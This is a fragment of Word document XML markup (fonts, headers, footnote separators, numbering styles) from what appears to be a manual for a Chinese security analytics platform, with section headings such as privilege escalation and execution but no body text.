    </w:tbl>
    <w:p w14:paraId="22932802" w14:textId="77777777" w:rsidR="00AE579F" w:rsidRPr="00A65911" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02729BC3" w14:textId="77777777" w:rsidR="00AE579F" w:rsidRPr="0069302E" w:rsidRDefault="00AE579F" w:rsidP="00AE579F"/>
    <w:p w14:paraId="49F4A0C6" w14:textId="77777777" w:rsidR="00AE579F" w:rsidRPr="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F"/>
    <w:sectPr w:rsidR="00AE579F" w:rsidRPr="00AE579F" w:rsidSect="00F815A5">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567"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B5CBB9" w14:textId="77777777" w:rsidR="0021055D" w:rsidRDefault="0021055D" w:rsidP="00B97FD2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E86AD86" w14:textId="77777777" w:rsidR="0021055D" w:rsidRDefault="0021055D" w:rsidP="00B97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黑体">
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002BF" w:usb1="38CF7CFA" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="微软雅黑">
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000287" w:usb1="28CF3C52" w:usb2="00000016" w:usb3="00000000" w:csb0="0004001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PMingLiU">
    <w:panose1 w:val="02020500000000000000"/>
    <w:charset w:val="88"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002FF" w:usb1="28CFFCFA" w:usb2="00000016" w:usb3="00000000" w:csb0="00100001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Roboto-Bold">
    <w:altName w:val="Angsana New"/>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0F5AFD" w14:textId="77777777" w:rsidR="0021055D" w:rsidRDefault="0021055D" w:rsidP="00B97FD2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A6FAED6" w14:textId="77777777" w:rsidR="0021055D" w:rsidRDefault="0021055D" w:rsidP="00B97FD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88682B" w14:textId="77777777" w:rsidR="00CC5590" w:rsidRDefault="00CC5590">
    <w:pPr>
      <w:pStyle w:val="a6"/>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> DOCPROPERTY  ProductName </w:instrText>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>瀚思大数据安全智能分析平台</w:t>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:fldSimple w:instr=" DOCPROPERTY  Version ">
      <w:r>
        <w:t>V5.1</w:t>
      </w:r>
    </w:fldSimple>
    <w:r w:rsidRPr="00706170">
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> STYLEREF  "</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText>标题</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> 1" \n  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00F743F9">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> STYLEREF  "</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText>标题</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> 1" </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00F743F9">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>权限升级</w:t>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>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C194B" w14:textId="77777777" w:rsidR="00CC5590" w:rsidRDefault="00CC5590">
    <w:pPr>
      <w:pStyle w:val="a6"/>
      <w:spacing w:after="240"/>
    </w:pPr>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> DOCPROPERTY  ProductName </w:instrText>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>瀚思大数据安全智能分析平台</w:t>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:fldSimple w:instr=" DOCPROPERTY  Version ">
      <w:r>
        <w:t>V5.1</w:t>
      </w:r>
    </w:fldSimple>
    <w:r w:rsidRPr="00706170">
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> STYLEREF  "</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText>标题</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> 1" \n  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> STYLEREF  "</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText>标题</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> 1" </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>执行</w:t>
    </w:r>
    <w:r w:rsidRPr="00B47F8F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>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FB515" w14:textId="77777777" w:rsidR="00CC5590" w:rsidRDefault="00CC5590">
    <w:pPr>
      <w:pStyle w:val="a6"/>
    </w:pPr>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> DOCPROPERTY  ProductName </w:instrText>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>瀚思大数据安全智能分析平台</w:t>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="000D7A9F">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:fldSimple w:instr=" DOCPROPERTY  Version ">
      <w:r>
        <w:t>V5.1</w:t>
      </w:r>
    </w:fldSimple>
    <w:r w:rsidRPr="00706170">
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> STYLEREF  Glossary </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>术</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="eastAsia"/>
        <w:noProof/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>语</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="000000" w:themeColor="text1"/>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nsid w:val="FFFFFF88"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DA3EF886"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFFFFF89"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a0"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="06C034BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBFE0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A43284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49BE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A02FD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF9CC33A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="ItemStep"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="2013" w:hanging="397"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1375"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1585"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1795"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2005"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2215"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2425"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="Itemfigdes"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2635"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2845"/>
        </w:tabs>
        <w:ind w:left="1" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="0EDB2900"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BBA030E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="SubItemList"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1923" w:hanging="449"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:color w:val="auto"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"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7">
    <w:nsid w:val="18262C5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C06495C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Step"/>
      <w:lvlText w:val="步骤%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1559" w:hanging="822"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1469"/>
        </w:tabs>
        <w:ind w:left="1469" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1889"/>
        </w:tabs>
        <w:ind w:left="1889" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2309"/>
        </w:tabs>
        <w:ind w:left="2309" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2729"/>
        </w:tabs>
        <w:ind w:left="2729" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3149"/>
        </w:tabs>
        <w:ind w:left="3149" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3569"/>
        </w:tabs>
        <w:ind w:left="3569" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3989"/>
        </w:tabs>
        <w:ind w:left="3989" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4409"/>
        </w:tabs>
        <w:ind w:left="4409" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="2B935005"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39445B84"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="4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nothing"/>
      <w:lvlText w:val="%1.%2 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>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2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="568"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suff w:val="nothing"/>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a1"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>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Times New Roman" w:hint="eastAsia"/>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7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="FigureDescription"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="图%1-%8"/>
